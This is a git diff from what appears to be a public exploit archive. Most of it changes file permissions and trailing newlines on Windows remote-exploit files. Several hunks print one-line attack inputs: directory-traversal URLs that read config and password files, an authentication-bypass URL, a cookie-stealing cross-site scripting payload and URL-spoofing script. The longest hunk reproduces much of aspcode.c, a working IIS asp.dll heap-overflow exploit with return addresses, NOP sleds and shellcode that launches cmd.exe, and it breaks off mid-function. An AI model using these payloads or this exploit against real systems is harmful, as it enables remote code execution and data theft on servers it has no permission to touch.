b/platforms/windows/remote/21035.txt @@ -8,4 +8,4 @@ This would normally only be a local issue but in combination with other known vu Due to the issue discussed as Bugtraq ID 3100, the passwords can be disclosed to remote attackers. -http://home.victim.com:8080/../ssd.ini \ No newline at end of file +http://home.victim.com:8080/../ssd.ini \ No newline at end of file diff --git a/platforms/windows/remote/21057.txt b/platforms/windows/remote/21057.txt old mode 100755 new mode 100644 index 1e29257ff..857052e8d --- a/platforms/windows/remote/21057.txt +++ b/platforms/windows/remote/21057.txt @@ -4,4 +4,4 @@ A vulnerability has been discovered in Microsoft IIS that may disclose the inter It has been reported that a target host using HTTP is also vulnerable to this issue. -GET /directory HTTP/1.0 \ No newline at end of file +GET /directory HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/remote/21109.c b/platforms/windows/remote/21109.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21113.txt b/platforms/windows/remote/21113.txt old mode 100755 new mode 100644 index 58c31e649..80a75abdb --- a/platforms/windows/remote/21113.txt +++ b/platforms/windows/remote/21113.txt @@ -12,4 +12,4 @@ http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=ext http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo -http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=fileinfo \ No newline at end of file +http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=fileinfo \ No newline at end of file diff --git a/platforms/windows/remote/21118.txt b/platforms/windows/remote/21118.txt old mode 100755 new mode 100644 index 5993b02e8..c66a96aee --- a/platforms/windows/remote/21118.txt +++ b/platforms/windows/remote/21118.txt @@ -45,4 +45,4 @@ Now we change the @ sign to its ASCII equivalent (%40): ------------------------ http://mike%403475959674 ------------------------- \ No newline at end of file +------------------------ \ No newline at end of file diff --git a/platforms/windows/remote/21127.txt b/platforms/windows/remote/21127.txt old mode 100755 new mode 100644 index e9e80d40b..c58036b7f --- a/platforms/windows/remote/21127.txt +++ b/platforms/windows/remote/21127.txt @@ -33,4 +33,4 @@ vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h); var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: -8pt;">https://<spoofed URI>\x3C/div>' \ No newline at end of file +8pt;">https://<spoofed URI>\x3C/div>' \ No newline at end of file diff --git a/platforms/windows/remote/21144.txt b/platforms/windows/remote/21144.txt old mode 100755 new mode 100644 index fa202ea42..71ac934af --- a/platforms/windows/remote/21144.txt +++ b/platforms/windows/remote/21144.txt @@ -4,4 +4,4 @@ Internet Explorer contains a vulnerability, which could allow an attacker to con If a URL is composed in the about: protocol referencing a website, Javascript embedded in the URL can access any cookies associated with that website via 'document.cookie'. The Javascript executes because of a cross-site scripting condition in the about: protocol. -about://www.google.com/<script language=javascript>alert(document.cookie);</script> \ No newline at end of file +about://www.google.com/<script language=javascript>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/windows/remote/21153.c b/platforms/windows/remote/21153.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21156.txt b/platforms/windows/remote/21156.txt old mode 100755 new mode 100644 index bc77cf87f..45cdd94ff --- a/platforms/windows/remote/21156.txt +++ b/platforms/windows/remote/21156.txt @@ -19,4 +19,4 @@ a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setT a.document.close(); } setTimeout("f()",5000); ------------------------------------ \ No newline at end of file +----------------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/21164.txt b/platforms/windows/remote/21164.txt old mode 100755 new mode 100644 index 173e1c988..f4b4223be --- a/platforms/windows/remote/21164.txt +++ b/platforms/windows/remote/21164.txt @@ -48,4 +48,4 @@ Response.BinaryWrite objStream.Read objStream.Close Set objStream = Nothing -%> \ No newline at end of file +%> \ No newline at end of file diff --git a/platforms/windows/remote/21169.txt b/platforms/windows/remote/21169.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21178.html b/platforms/windows/remote/21178.html old mode 100755 new mode 100644 index f559d8645..c052ff539 --- a/platforms/windows/remote/21178.html +++ b/platforms/windows/remote/21178.html @@ -22,4 +22,4 @@ E-Mail: <INPUT NAME="email" SIZE=30> Comments:<TEXTAREA name="comments" ROWS=10 COLS=50 SIZE="10">&lt;/textarea&gt; Press <INPUT TYPE="submit" VALUE="Submit"> -Idiot <INPUT TYPE="HALT !" VALUE="The Above Is A Example Only - The Data Is Fake"> \ No newline at end of file +Idiot <INPUT TYPE="HALT !" VALUE="The Above Is A Example Only - The Data Is Fake"> \ No newline at end of file diff --git a/platforms/windows/remote/21188.c b/platforms/windows/remote/21188.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21189.c b/platforms/windows/remote/21189.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21195.txt b/platforms/windows/remote/21195.txt old mode 100755 new mode 100644 index fce1d7542..1e42a8c24 --- a/platforms/windows/remote/21195.txt +++ b/platforms/windows/remote/21195.txt @@ -6,4 +6,4 @@ The problem occurs when the 'GetObject()' JScript function is used with the Acti a=GetObject("http://"+location.host+"/../../../../../../test.txt","htmlfile"); -This vulnerability could be used by a malicious web site administrator to view any known file on a target system. It may also lead to the execution of arbitrary code. \ No newline at end of file +This vulnerability could be used by a malicious web site administrator to view any known file on a target system. It may also lead to the execution of arbitrary code. \ No newline at end of file diff --git a/platforms/windows/remote/21196.txt b/platforms/windows/remote/21196.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21198.html b/platforms/windows/remote/21198.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21199.txt b/platforms/windows/remote/21199.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21203.txt b/platforms/windows/remote/21203.txt old mode 100755 new mode 100644 index d63e4beb4..08d6ac750 --- a/platforms/windows/remote/21203.txt +++ b/platforms/windows/remote/21203.txt @@ -4,4 +4,4 @@ VitalNet is part of Lucent's VitalSuite SP product family. VitalNet allows users The implementation of VitalNet's cookie-based authentication mechanism is flawed. An attacker who successfully guesses a correct username can gain access to the server without need of a valid password. -http://<serverip>/cgi-bin/VsSetCookie.exe?vsuser=<user_name> \ No newline at end of file +http://<serverip>/cgi-bin/VsSetCookie.exe?vsuser=<user_name> \ No newline at end of file diff --git a/platforms/windows/remote/21204.txt b/platforms/windows/remote/21204.txt old mode 100755 new mode 100644 index bf1bd4b32..ed5726ecc --- a/platforms/windows/remote/21204.txt +++ b/platforms/windows/remote/21204.txt @@ -6,4 +6,4 @@ As a result, it is possible for an attacker to append a filepath to the end of w It is also possible to run executables in the PHP directory via successful exploitation of this vulnerability. -http://[targethost]/php/php.exe?c:\[filepath] \ No newline at end of file +http://[targethost]/php/php.exe?c:\[filepath] \ No newline at end of file diff --git a/platforms/windows/remote/21207.c b/platforms/windows/remote/21207.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21211.txt b/platforms/windows/remote/21211.txt old mode 100755 new mode 100644 index 8c815cafb..2914d73dc --- a/platforms/windows/remote/21211.txt +++ b/platforms/windows/remote/21211.txt @@ -8,4 +8,4 @@ It should be noted that this vulnerability may only be exploited to access passw The following example will give the attacker access to the administrative interface: -http://host/./admin/ \ No newline at end of file +http://host/./admin/ \ No newline at end of file diff --git a/platforms/windows/remote/21214.c b/platforms/windows/remote/21214.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21225.c b/platforms/windows/remote/21225.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21260.txt b/platforms/windows/remote/21260.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21274.c b/platforms/windows/remote/21274.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21286.c b/platforms/windows/remote/21286.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21294.c b/platforms/windows/remote/21294.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21298.c b/platforms/windows/remote/21298.c old mode 100755 new mode 100644 index a76bf9756..639aaf1cc --- a/platforms/windows/remote/21298.c +++ b/platforms/windows/remote/21298.c @@ -178,4 +178,4 @@ Author: B-r00t aka B#. 2003. <br00t@blueyonder.co.uk> (c) "If You Can't B-r00t Then Just B#." ENJOY! -*/ \ No newline at end of file +*/ \ No newline at end of file diff --git a/platforms/windows/remote/21303.txt b/platforms/windows/remote/21303.txt old mode 100755 new mode 100644 index 1920c1a40..009133ced --- a/platforms/windows/remote/21303.txt +++ b/platforms/windows/remote/21303.txt @@ -8,4 +8,4 @@ On Windows operating systems, webservers run in the SYSTEM context. A remote att Deerfield's D2Gfx is powered by BadBlue v1.02 and should be considered vulnerable as well. -http://server/.../...//file.ext \ No newline at end of file +http://server/.../...//file.ext \ No newline at end of file diff --git a/platforms/windows/remote/21311.txt b/platforms/windows/remote/21311.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21313.txt b/platforms/windows/remote/21313.txt old mode 100755 new mode 100644 index 13f400407..7aa3636a7 --- a/platforms/windows/remote/21313.txt +++ b/platforms/windows/remote/21313.txt @@ -10,4 +10,4 @@ Authorization: Basic cTFraTk6ZDA5a2xt GET / HTTP/1.1 Host: iis-server -Authorization: Negotiate TlRMTVNTUAABAAAAB4IAoAAAAAAAAAAAAAAAAAAAAAA= \ No newline at end of file +Authorization: Negotiate TlRMTVNTUAABAAAAB4IAoAAAAAAAAAAAAAAAAAAAAAA= \ No newline at end of file diff --git a/platforms/windows/remote/21361.txt b/platforms/windows/remote/21361.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21367.txt b/platforms/windows/remote/21367.txt old mode 100755 new mode 100644 index f4b958201..970a95c28 --- a/platforms/windows/remote/21367.txt +++ b/platforms/windows/remote/21367.txt @@ -8,4 +8,4 @@ This issue may be exploited by a remote attacker to gain access to the administr This issue was reported for Abyss Web Server for Microsoft Windows operating systems. It is not known whether the Linux version is also affected by this vulnerability. Furthermore, it should be noted that web servers on multi-user Windows operating systems generally run with SYSTEM privileges. -http://target/cgi-bin/%2e%2e/abyss.conf \ No newline at end of file +http://target/cgi-bin/%2e%2e/abyss.conf \ No newline at end of file diff --git a/platforms/windows/remote/21368.c b/platforms/windows/remote/21368.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21369.c b/platforms/windows/remote/21369.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21370.c b/platforms/windows/remote/21370.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21371.c b/platforms/windows/remote/21371.c old mode 100755 new mode 100644 index 051130d5d..4ca631ab9 --- a/platforms/windows/remote/21371.c +++ b/platforms/windows/remote/21371.c @@ -1,1484 +1,1486 @@ +/* source: http://www.securityfocus.com/bid/4485/info - -A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services). - -This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host. - -Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable. - -A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves. - /* - aspcode.c ver1.0 - iis4.0��iis5.0��iis5.1 asp.dll overflow program - copy by yuange <yuange@nsfocus.com> 2002.4.24 - */ - #include <windows.h> - #include <winsock.h> - #include <stdio.h> - #include <httpext.h> - #pragma comment(lib,"ws2_32") - //#define RETEIPADDR eipwin2000 - #define FNENDLONG 0x08 - #define NOPCODE 0x90 - #define NOPLONG 0x50 - #define BUFFSIZE 0x20000 - #define PATHLONG 0x12 - #define RETEIPADDRESS 0x468 - #define SHELLBUFFSIZE 0x800 - #define SHELLFNNUMS 14 - #define DATABASE 0x61 - #define DATAXORCODE 0x55 - #define LOCKBIGNUM 19999999 - #define LOCKBIGNUM2 13579139 - #define MCBSIZE 0x8 - #define MEMSIZE 0xb200 - #define SHELLPORT 0x1f90 //0x1f90=8080 - #define WEBPORT 80 - void shellcodefnlock(); - void shellcodefnlock2(); - void shellcodefn(char *ecb); - void shellcodefn2(char *ecb); - void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int - len); - void iisput(int fd,char *str); - void iisget(int fd,char *str); - void iiscmd(int fd,char *str); - void iisreset(); - void iisdie(); - void iishelp(); - int newrecv(int fd,char *buff,int size,int flag); - int newsend(int fd,char *buff,int size,int flag); - int xordatabegin; - int lockintvar1,lockintvar2; - char lockcharvar; - int main(int argc, char **argv) - { - char *server; - char *str="LoadLibraryA""\x0""CreatePipe""\x0" - "CreateProcessA""\x0""CloseHandle""\x0" - "PeekNamedPipe""\x0" - "ReadFile""\x0""WriteFile""\x0" - "CreateFileA""\x0" - "GetFileSize""\x0" - "GetLastError""\x0" - "Sleep""\x0" - "\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0" - "\x09""asp.dll""\x0""HttpExtensionProc""\x0" - "\x09""msvcrt.dll""\x0""memcpy""\x0""\x0" - "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0" - "XORDATA""\x0""xordatareset""\x0" - "strend"; - // char buff0[]="TRACK / HTTP/1.1\nHOST:"; - char buff1[]="GET /"; - char buff2[]="default.asp"; - char *buff2add; - char buff3[]="?!!ko "; - char buff4[]=" HTTP/1.1 \nHOST:"; - char buff5[]="\nContent-Type: application/x-www-form-urlencoded"; - char buff51[]="\nTransfer-Encoding:chunked"; - char buff6[]="\nContent-length: 2147506431\r\n\r\n"; // - 0x80000000+MEMSIZE-1 - char buff61[]="\nContent-length: 4294967295\r\n\r\n"; // 0xffffffff - char buff7[]= - "\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01"; - char buff11[]= - "\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01"; - char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01"; - char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"; - char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90"; - /* - char - buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01"; - char - buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01"; - char - buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01"; - char - buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01"; - char - buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01"; - char - buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01"; - */ - char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; - char SRLF[]="\x0d\x0a\x00\x00"; - - char *eipexceptwin2000add; - char eipexceptwin20002[]="\x80\x70\x9f\x74"; // push ebx ; - ret address - char eipexceptwin2000cn[]="\x73\x67\xfa\x7F"; // push ebx ; - ret address - char eipexceptwin2000[]="\x80\x70\x97\x74"; - // char eipexceptwin2000[]="\xb3\x9d\xfa\x77"; // \x01\x78"; - // call ebx address - char eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78"; - char eipexceptwin2000sp2[]="\x02\xbc\x01\x78"; - // char eipexceptwin2000[]="\x0B\x08\x5A\x68"; - // char eipexceptwin2000[]="\x32\x8d\x9f\x74"; - char eipexceptwinnt[] ="\x82\x01\xfc\x7F"; // push esi ; - ret address - // char eipexceptwinnt[] ="\x2e\x01\x01\x78"; - // call esi address - // char eipexcept2[]="\xd0\xae\xdc\x77"; // - char buff[BUFFSIZE]; - char recvbuff[BUFFSIZE]; - char shellcodebuff[BUFFSIZE]; - char shellcodebuff2[BUFFSIZE]; - struct sockaddr_in s_in2,s_in3; - struct hostent *he; - char *shellcodefnadd,*chkespadd; - unsigned int sendpacketlong,buff2long,shelladd,packlong; - int i,j,k,l,strheadlong; - unsigned char temp; - int fd; - u_short port,port1,shellcodeport; - SOCKET d_ip; - WSADATA wsaData; - int offset=0; - int OVERADD=RETEIPADDRESS; - int result; - fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 ."); - fprintf(stderr,"\n copy by yuange 2002.4.24."); - fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net ."); - fprintf(stderr,"\n welcome to http://www.nsfocus.com ."); - fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n", - argv[0]); - buff2add=buff2; - if(argc <2){ - fprintf(stderr,"\n please enter the web server:"); - gets(recvbuff); - for(i=0;i<strlen(recvbuff);++i){ - if(recvbuff[i]!=' ') break; - } - server=recvbuff; - if(i<strlen(recvbuff)) server+=i; - fprintf(stderr,"\n please enter the .asp filename:"); - gets(shellcodebuff); - for(i=0;i<strlen(shellcodebuff);++i){ - if(shellcodebuff[i]!=' ') break; - } - buff2add=shellcodebuff+i; - printf("\n .asp file name:%s\n",buff2add); +A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services). + +This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host. + +Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable. + +A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves. +*/ + +/* + aspcode.c ver1.0 + iis4.0��iis5.0��iis5.1 asp.dll overflow program + copy by yuange <yuange@nsfocus.com> 2002.4.24 +*/ +#include <windows.h> +#include <winsock.h> +#include <stdio.h> +#include <httpext.h> +#pragma comment(lib,"ws2_32") +//#define RETEIPADDR eipwin2000 +#define FNENDLONG 0x08 +#define NOPCODE 0x90 +#define NOPLONG 0x50 +#define BUFFSIZE 0x20000 +#define PATHLONG 0x12 +#define RETEIPADDRESS 0x468 +#define SHELLBUFFSIZE 0x800 +#define SHELLFNNUMS 14 +#define DATABASE 0x61 +#define DATAXORCODE 0x55 +#define LOCKBIGNUM 19999999 +#define LOCKBIGNUM2 13579139 +#define MCBSIZE 0x8 +#define MEMSIZE 0xb200 +#define SHELLPORT 0x1f90 //0x1f90=8080 +#define WEBPORT 80 +void shellcodefnlock(); +void shellcodefnlock2(); +void shellcodefn(char *ecb); +void shellcodefn2(char *ecb); +void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int +len); +void iisput(int fd,char *str); +void iisget(int fd,char *str); +void iiscmd(int fd,char *str); +void iisreset(); +void iisdie(); +void iishelp(); +int newrecv(int fd,char *buff,int size,int flag); +int newsend(int fd,char *buff,int size,int flag); + int xordatabegin; + int lockintvar1,lockintvar2; + char lockcharvar; +int main(int argc, char **argv) +{ + char *server; + char *str="LoadLibraryA""\x0""CreatePipe""\x0" + "CreateProcessA""\x0""CloseHandle""\x0" + "PeekNamedPipe""\x0" + "ReadFile""\x0""WriteFile""\x0" + "CreateFileA""\x0" + "GetFileSize""\x0" + "GetLastError""\x0" + "Sleep""\x0" + "\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0" + "\x09""asp.dll""\x0""HttpExtensionProc""\x0" + "\x09""msvcrt.dll""\x0""memcpy""\x0""\x0" + "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0" + "XORDATA""\x0""xordatareset""\x0" + "strend"; +// char buff0[]="TRACK / HTTP/1.1\nHOST:"; + char buff1[]="GET /"; + char buff2[]="default.asp"; + char *buff2add; + char buff3[]="?!!ko "; + char buff4[]=" HTTP/1.1 \nHOST:"; + char buff5[]="\nContent-Type: application/x-www-form-urlencoded"; + char buff51[]="\nTransfer-Encoding:chunked"; + char buff6[]="\nContent-length: 2147506431\r\n\r\n"; // +0x80000000+MEMSIZE-1 + char buff61[]="\nContent-length: 4294967295\r\n\r\n"; // 0xffffffff + char buff7[]= +"\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01"; + char buff11[]= +"\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01"; + char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01"; + char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"; + char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90"; + /* + char +buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01"; + char +buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01"; + char +buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01"; + char +buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01"; + char +buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01"; + char +buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01"; +*/ + char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; + char SRLF[]="\x0d\x0a\x00\x00"; + + char *eipexceptwin2000add; + char eipexceptwin20002[]="\x80\x70\x9f\x74"; // push ebx ; +ret address + char eipexceptwin2000cn[]="\x73\x67\xfa\x7F"; // push ebx ; +ret address + char eipexceptwin2000[]="\x80\x70\x97\x74"; +// char eipexceptwin2000[]="\xb3\x9d\xfa\x77"; // \x01\x78"; +// call ebx address + char eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78"; + char eipexceptwin2000sp2[]="\x02\xbc\x01\x78"; +// char eipexceptwin2000[]="\x0B\x08\x5A\x68"; +// char eipexceptwin2000[]="\x32\x8d\x9f\x74"; + char eipexceptwinnt[] ="\x82\x01\xfc\x7F"; // push esi ; +ret address +// char eipexceptwinnt[] ="\x2e\x01\x01\x78"; +// call esi address +// char eipexcept2[]="\xd0\xae\xdc\x77"; // + char buff[BUFFSIZE]; + char recvbuff[BUFFSIZE]; + char shellcodebuff[BUFFSIZE]; + char shellcodebuff2[BUFFSIZE]; + struct sockaddr_in s_in2,s_in3; + struct hostent *he; + char *shellcodefnadd,*chkespadd; + unsigned int sendpacketlong,buff2long,shelladd,packlong; + int i,j,k,l,strheadlong; + unsigned char temp; + int fd; + u_short port,port1,shellcodeport; + SOCKET d_ip; + WSADATA wsaData; + int offset=0; + int OVERADD=RETEIPADDRESS; + int result; + fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 ."); + fprintf(stderr,"\n copy by yuange 2002.4.24."); + fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net ."); + fprintf(stderr,"\n welcome to http://www.nsfocus.com ."); + fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n", +argv[0]); + buff2add=buff2; + if(argc <2){ + fprintf(stderr,"\n please enter the web server:"); + gets(recvbuff); + for(i=0;i<strlen(recvbuff);++i){ + if(recvbuff[i]!=' ') break; } - eipexceptwin2000add=eipexceptwin2000; - // printf("\n argc%d argv%s",argc,argv[5]); - if(argc>5){ - if(strcmp(argv[5],"cn")==0) { - eipexceptwin2000add=eipexceptwin2000cn; - printf("\n For the cn system.\n"); - } - if(strcmp(argv[5],"sp0")==0) { - eipexceptwin2000add=eipexceptwin20002; - printf("\n For the sp0 system.\n"); - } - if(strcmp(argv[5],"msvcrt")==0) { - eipexceptwin2000add=eipexceptwin2000msvcrt; - printf("\n Use msvcrt.dll JMP to shell.\n"); - } - if(strcmp(argv[5],"sp2")==0) { - eipexceptwin2000add=eipexceptwin2000sp2; - printf("\n Use sp2 msvcrt.dll JMP to shell.\n"); - } + server=recvbuff; + if(i<strlen(recvbuff)) server+=i; + fprintf(stderr,"\n please enter the .asp filename:"); + gets(shellcodebuff); + for(i=0;i<strlen(shellcodebuff);++i){ + if(shellcodebuff[i]!=' ') break; } - result= WSAStartup(MAKEWORD(1, 1), &wsaData); - if (result != 0) { - fprintf(stderr, "Your computer was not connected " - "to the Internet at the time that " - "this program was launched, or you " - "do not have a 32-bit " - "connection to the Internet."); - exit(1); - } - /* - if(argc>4){ - offset=atoi(argv[4]); + buff2add=shellcodebuff+i; + printf("\n .asp file name:%s\n",buff2add); + } + eipexceptwin2000add=eipexceptwin2000; +// printf("\n argc%d argv%s",argc,argv[5]); + if(argc>5){ + if(strcmp(argv[5],"cn")==0) { + eipexceptwin2000add=eipexceptwin2000cn; + printf("\n For the cn system.\n"); } - // OVERADD+=offset; - // packlong=0x10000-offset+0x8; - if(offset<-0x20||offset>0x20){ - fprintf(stderr,"\n offset error !offset -32 --- +32 ."); - gets(buff); - exit(1); + if(strcmp(argv[5],"sp0")==0) { + eipexceptwin2000add=eipexceptwin20002; + printf("\n For the sp0 system.\n"); } - */ - if(argc <2){ - // WSACleanup( ); - // exit(1); + if(strcmp(argv[5],"msvcrt")==0) { + eipexceptwin2000add=eipexceptwin2000msvcrt; + printf("\n Use msvcrt.dll JMP to shell.\n"); } - else server = argv[1]; - for(i=0;i<strlen(server);++i){ - if(server[i]!=' ') - break; + if(strcmp(argv[5],"sp2")==0) { + eipexceptwin2000add=eipexceptwin2000sp2; + printf("\n Use sp2 msvcrt.dll JMP to shell.\n"); } - if(i<strlen(server)) server+=i; - for(i=0;i+3<strlen(server);++i){ - - if(server[i]==':'){ - if(server[i+1]=='\\'||server[i+1]=='/'){ - if(server[i+2]=='\\'||server[i+2]=='/'){ - server+=i; - server+=3; - break; - } - } - } - } - for(i=1;i<=strlen(server);++i){ - if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0; - } - d_ip = inet_addr(server); - if(d_ip==-1){ - he = gethostbyname(server); - if(!he) - { - WSACleanup( ); - printf("\n Can't get the ip of %s !\n",server); - gets(buff); - exit(1); - } - else memcpy(&d_ip, he->h_addr, 4); - } - - if(argc>3) port=atoi(argv[3]); - else port=WEBPORT; - if(port==0) port=WEBPORT; - fd = socket(AF_INET, SOCK_STREAM,0); - i=8000; - setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i)); - - s_in3.sin_family = AF_INET; - s_in3.sin_port = htons(port); - s_in3.sin_addr.s_addr = d_ip; - printf("\n nuke ip: %s port - %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); - - if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct - sockaddr_in))!=0) - { - closesocket(fd); - WSACleanup( ); - fprintf(stderr,"\n connect err."); - gets(buff); - exit(1); + } + result= WSAStartup(MAKEWORD(1, 1), &wsaData); + if (result != 0) { + fprintf(stderr, "Your computer was not connected " + "to the Internet at the time that " + "this program was launched, or you " + "do not have a 32-bit " + "connection to the Internet."); + exit(1); } - - _asm{ - mov ESI,ESP - cmp ESI,ESP - } - _chkesp(); - chkespadd=_chkesp; - temp=*chkespadd; - if(temp==0xe9) { - ++chkespadd; - i=*(int*)chkespadd; - chkespadd+=i; - chkespadd+=4; - } - /* - shellcodefnadd=shellcodefnlock; - temp=*shellcodefnadd; - if(temp==0xe9) { - ++shellcodefnadd; - k=*(int *)shellcodefnadd; - shellcodefnadd+=k; - shellcodefnadd+=4; - } - for(k=0;k<=0x500;++k){ - if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; - } - */ - memset(buff,NOPCODE,BUFFSIZE); - /* - strcpy(buff,buff0); - if(argc>6) strcat(buff,argv[6]); - else strcat(buff,server); - strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n"); - - strcat(buff,buff1); - */ - strcpy(buff,buff1); - strheadlong=strlen(buff); - OVERADD+=strheadlong-1; - - if(argc>2) buff2add=argv[2]; - for(;;++buff2add){ - temp=*buff2add; - if(temp!='\\'&&temp!='/') break; - } - // printf("\nfile:%s",buff2add); - buff2long=strlen(buff2add); - strcat(buff,buff2add); - // fprintf(stderr,"\n offset:%d\n",offset); - // offset+=strheadlong-strlen(buff1); - - /* - for(i=0x404;i<=0x500;i+=8){ - memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 - memcpy(buff+offset+i+4,eipexceptwin2000add,4); - } - if(argc>5){ - if(strcmp(argv[5],"sp2")==0) { - memcpy(buff+offset+i,"\x58",1); - } - } - for(i=0x220;i<=0x380;i+=8){ - memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 - memcpy(buff+offset+i+4,eipexceptwinnt,4); - } - for(i=0x580;i<=0x728;i+=8){ - memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 - memcpy(buff+offset+i+4,eipexceptwinnt,4); - } - */ - // winnt 0x2cc or 0x71c win2000 0x130 or 0x468 - // memcpy(buff+offset+i+8,exceptret,strlen(exceptret)); - shellcodefnadd=shellcodefnlock; - temp=*shellcodefnadd; - if(temp==0xe9) { - ++shellcodefnadd; - k=*(int *)shellcodefnadd; - shellcodefnadd+=k; - shellcodefnadd+=4; - } - for(k=0;k<=0x500;++k){ - if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; - } - memset(shellcodebuff2,NOPCODE,BUFFSIZE); - i=0x1000; - memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100); - - shellcodefnadd=shellcodefn; - temp=*shellcodefnadd; - if(temp==0xe9) { - ++shellcodefnadd; - k=*(int *)shellcodefnadd; - shellcodefnadd+=k; - 